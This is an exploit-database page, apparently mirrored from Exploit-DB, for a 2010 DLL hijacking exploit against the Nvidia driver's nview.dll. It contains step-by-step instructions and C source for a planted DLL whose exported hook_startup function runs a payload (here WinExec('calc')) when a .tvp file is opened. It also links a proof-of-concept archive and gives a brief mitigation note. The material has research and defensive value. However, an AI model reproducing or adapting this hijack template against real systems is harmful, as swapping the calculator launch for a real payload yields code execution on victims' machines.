header-logo
Suggest Exploit
vendor:
Nvidia Driver
by:
Encrypt3d.M!nd
7,2
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Nvidia Driver
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Nvidia Driver (nview.dll) Dll Hijacking Exploit

Compile the following code and rename it to nview.dll and place file with one of the affected types in the same directory of the dll. Affected types: tvp. Code used from this advisory: http://www.exploit-db.com/exploits/14758/

Mitigation:

Ensure that the application is not vulnerable to DLL hijacking by validating the DLLs that are loaded by the application.
Source

Exploit-DB raw data:

/*
Nvidia Driver (nview.dll) Dll Hijacking Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://www.nvidia.com/Download/index.aspx?lang=en-us

Details:
Compile the following code and rename it to nview.dll
and place file with one of the affected types in the same directory of the dll

Affected types: tvp

Code :(used the one from this
advisory:http://www.exploit-db.com/exploits/14758/):
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14769.rar (nvidia-poc.rar)